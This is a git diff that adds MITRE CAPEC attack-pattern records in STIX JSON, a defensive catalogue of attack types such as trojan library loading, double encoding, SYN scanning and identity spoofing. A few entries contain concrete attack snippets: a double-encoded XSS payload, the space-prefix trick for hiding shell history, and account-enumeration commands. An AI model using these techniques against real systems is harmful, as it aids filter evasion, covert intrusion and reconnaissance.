Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "Changing the LD_LIBRARY_PATH environment variable in TELNET will cause TELNET to use an alternate (possibly Trojan) version of a function library. The Trojan library must be accessible using the target file system and should include Trojan code that will allow the user to log in with a bad password. This requires that the attacker upload the Trojan library to a specific location on the target. As an alternative to uploading a Trojan file, some file systems support file paths that include remote addresses, such as \\\\172.16.2.100\\shared_files\\trojan_dll.dll. See also: Path Manipulation (CVE-1999-0073)", + "The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". HISTCONTROL can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that \" ls\" will not be saved, but \"ls\" would be saved by history. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An environment variable is accessible to the user.", + "An environment variable used by the application can be tainted with user supplied data.", + "Input data used in an environment variable is not validated properly.", + "The variables encapsulation is not done properly. For instance setting a variable as public in a class makes it visible and an attacker may attempt to manipulate that variable." + ], + "x_capec_skills_required": { + "High": "Some more advanced attacks may require knowledge about protocols and probing technique which help controlling a variable. The malicious user may try to understand the authentication mechanism in order to defeat it.", + "Low": "In a web based scenario, the client controls the data that it submitted to the server. So anybody can try to send malicious data and try to bypass the authentication mechanism." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776.json b/capec/attack-pattern/attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776.json new file mode 100644 index 0000000000..d2c2dc19f5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--bcdafa68-a62a-44af-b1c3-1971389329f7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f0bd351b-636b-4299-bf9c-6a27b6301776", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Disabling Network Hardware", + "description": "In this attack pattern, an adversary physically disables networking hardware by powering it down or disconnecting critical equipment. Disabling or shutting off critical system resources prevents them from performing their service as intended, which can have direct and indirect consequences on other systems. This attack pattern is considerably less technical than the selective blocking used in most obstruction attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/583.html", + "external_id": "CAPEC-583" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Analysis of Country-wide Internet Outages Caused by Censorship, 2011, Center for Applied Internet Data Analysis", + "url": "http://www.caida.org/publications/papers/2011/outages_censorship/outages_censorship.pdf", + "external_id": "REF-464" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (Denial of Service)" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires physical access to the targeted communications equipment (networking devices, cables, etc.), which may be spread over a wide area." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b.json b/capec/attack-pattern/attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b.json new file mode 100644 index 0000000000..36c113fbd9 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--6cf0bd94-4e45-44e1-b02c-dcfcdc425055", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f1d3ef87-d787-4db4-8964-5cdc6d02242b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Infected Memory", + "description": "An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/456.html", + "external_id": "CAPEC-456" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_example_instances": [ + "A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.", + "In 2007, approximately 1800 of Seagate's Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f2009992-b316-48ff-8d26-862971791ad3.json b/capec/attack-pattern/attack-pattern--f2009992-b316-48ff-8d26-862971791ad3.json new file mode 100644 index 0000000000..f277e3c1a4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f2009992-b316-48ff-8d26-862971791ad3.json @@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--40a7a66e-2672-4bcf-a204-81a8d0176efc", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f2009992-b316-48ff-8d26-862971791ad3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Accessing Functionality Not Properly Constrained by ACLs", + "description": "In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/1.html", + "external_id": "CAPEC-1" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/276.html", + "external_id": "CWE-276" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/721.html", + "external_id": "CWE-721" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/434.html", + "external_id": "CWE-434" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "\n Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a \"Single front controller\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.\n If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.", + "The various resources, or individual URLs, must be somehow discoverable by the attacker", + "The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f234373b-0d04-4ad3-9c78-ad932c9fa28c.json b/capec/attack-pattern/attack-pattern--f234373b-0d04-4ad3-9c78-ad932c9fa28c.json new file mode 100644 index 0000000000..a581939db7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f234373b-0d04-4ad3-9c78-ad932c9fa28c.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--55ae395b-a70b-4fcb-bc09-dc7f3dd280f7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f234373b-0d04-4ad3-9c78-ad932c9fa28c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Malicious Software Download", + "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/185.html", + "external_id": "CAPEC-185" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html", + "external_id": "CWE-494" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af.json b/capec/attack-pattern/attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af.json new file mode 100644 index 0000000000..6b2a3de8a6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af.json @@ -0,0 +1,102 @@ +{ + "type": "bundle", + "id": "bundle--0578cf34-2934-4c09-a699-1bd3acf1e0af", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f25dc9c0-4a8d-4131-9802-71631d0a08af", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Double Encoding", + "description": "The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/120.html", + "external_id": "CAPEC-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html", + "external_id": "CWE-177" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html", + "external_id": "CWE-183" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html", + "external_id": "CWE-692" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "\n Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:\n %253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E\n Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.", + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_resources_required": [ + "Tools that automate encoding of data can assist the adversary in generating encoded strings." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b.json b/capec/attack-pattern/attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b.json new file mode 100644 index 0000000000..55ebc841d2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--9be9e6e7-049e-4d5f-988c-4bcae29c5854", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f2ee0774-b921-420d-b786-31d5156c671b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Screen Temporary Files for Sensitive Information", + "description": "An adversary exploits the temporary, insecure storage of information by monitoring the content of files used to store temp data during an application's routine execution flow. Many applications use temporary files to accelerate processing or to provide records of state across multiple executions of the application. Sometimes, however, these temporary files may end up storing sensitive information. By screening an application's temporary files, an adversary might be able to discover such sensitive information. For example, web browsers often cache content to accelerate subsequent lookups. If the content contains sensitive information then the adversary could recover this from the web cache.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/155.html", + "external_id": "CAPEC-155" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html", + "external_id": "CWE-377" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must utilize temporary files and must fail to adequately secure them against other parties reading them." + ], + "x_capec_resources_required": [ + "Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f35584bc-105b-4708-aaae-9c35be199577.json b/capec/attack-pattern/attack-pattern--f35584bc-105b-4708-aaae-9c35be199577.json new file mode 100644 index 0000000000..ffb1eaff4a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f35584bc-105b-4708-aaae-9c35be199577.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--8d955197-9b47-469c-b47c-6a3c3d2fb271", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f35584bc-105b-4708-aaae-9c35be199577", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Incentives", + "description": "The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/426.html", + "external_id": "CAPEC-426" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "url": "http://www.social-engineer.org", + "external_id": "REF-348" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3.json b/capec/attack-pattern/attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3.json new file mode 100644 index 0000000000..8a7fe1434f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--5336cb72-25c7-41e8-8907-e2698b6f3c1a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f39ee485-4296-473e-9c38-c1729322fbc3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Using URL/codebase / G.A.C. (code source) to convince sandbox of privilege", + "description": "This attack pattern has been deprecated as it did not appear to be a valid attack pattern.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/238.html", + "external_id": "CAPEC-238" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f447cb81-c673-42b2-bcdc-d7e8beaf947e.json b/capec/attack-pattern/attack-pattern--f447cb81-c673-42b2-bcdc-d7e8beaf947e.json new file mode 100644 index 0000000000..d4e339caff --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f447cb81-c673-42b2-bcdc-d7e8beaf947e.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--d42c60f9-a08a-499f-9c81-8aa2515c33a9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f447cb81-c673-42b2-bcdc-d7e8beaf947e", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP SYN Scan", + "description": "An adversary uses a SYN scan to determine the status of ports on the remote target. SYN scanning is the most common type of port scanning that is used because of its enormous advantages and few drawbacks. As a result, novice attackers tend to overly rely on the SYN scan while performing system reconnaissance. As a scanning method, the primary advantages of SYN scanning are its universality and speed. RFC 793 defines the required behavior of any TCP/IP device in that an incoming connection request begins with a SYN packet, which in turn must be followed by a SYN/ACK packet from the receiving service. For this reason, like TCP Connect scanning, SYN scanning works against any TCP stack. Unlike TCP Connect scanning, it is possible to scan thousands of ports per second using this method. This type of scanning is usually referred to as 'half-open' scanning because it does not complete the three-way handshake. The scanning rate is extremely fast because no time is wasted completing the handshake or tearing down the connection. TCP SYN scanning can also immediately detect 3 of the 4 important types of port status: open, closed, and filtered. When a SYN is sent to an open port and unfiltered port, a SYN/ACK will be generated. This technique allows an attacker to scan through stateful firewalls due to the common configuration that TCP SYN segments for a new connection will be allowed for almost any port. When a SYN packet is sent to a closed port a RST is generated, indicating the port is closed. When SYN scanning to a particular port generates no response, or when the request triggers ICMP Type 3 unreachable errors, the port is filtered. A TCP Connect scan has the following characteristics:", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/287.html", + "external_id": "CAPEC-287" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other (A successful attack of this kind can identify open ports and available services on a system.)", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "This scan type is not possible with some operating systems (Windows XP SP 2). On Linux and Unix systems it requires root privileges to use raw sockets." + ], + "x_capec_resources_required": [ + "The ability to send TCP SYN segments to a host during network reconnaissance via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d.json b/capec/attack-pattern/attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d.json new file mode 100644 index 0000000000..68c9d40684 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d.json @@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--af3c3f5e-0b1c-4c5f-95fc-1a758556e566", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f44bd96f-9bc0-4343-b744-59a47d18a28d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Identity Spoofing", + "description": "Identity Spoofing refers to the action of assuming (i.e., taking on) the identity of some other entity (human or non-human) and then using that identity to accomplish a goal. An adversary may craft messages that appear to come from a different principle or use stolen / spoofed authentication credentials. Alternatively, an adversary may intercept a message from a legitimate sender and attempt to make it look like the message comes from them without changing its content. The latter form of this attack can be used to hijack credentials from legitimate users. Identity Spoofing attacks need not be limited to transmitted messages - any resource that is associated with an identity (for example, a file with a signature) can be the target of an attack where the adversary attempts to change the apparent identity. This attack differs from Content Spoofing attacks where the adversary does not wish to change the apparent identity of the message but instead wishes to change what the message says. In an Identity Spoofing attack, the adversary is attempting to change the identity of the content.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/151.html", + "external_id": "CAPEC-151" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html", + "external_id": "CWE-287" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Gain Privileges" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The identity associated with the message or resource must be removable or modifiable in an undetectable way." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f4d4d1a8-c846-4619-89ad-9682367f6f75.json b/capec/attack-pattern/attack-pattern--f4d4d1a8-c846-4619-89ad-9682367f6f75.json new file mode 100644 index 0000000000..0bb032998e --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f4d4d1a8-c846-4619-89ad-9682367f6f75.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--58500d01-025d-4827-a767-ecf09a040845", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f4d4d1a8-c846-4619-89ad-9682367f6f75", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: ICMP Fingerprinting Probes", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/316.html", + "external_id": "CAPEC-316" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c.json b/capec/attack-pattern/attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c.json new file mode 100644 index 0000000000..2b26399027 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--8de9f18c-434f-4f04-bb2d-541ea1a9e42c", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--f612c585-96cc-4f6b-9587-a68398da8e7c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Account Footprinting", + "description": "An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. Example Windows commands which can acquire this information are: \"net user\" and \"dsquery\".", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html", + "external_id": "CAPEC-575" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git 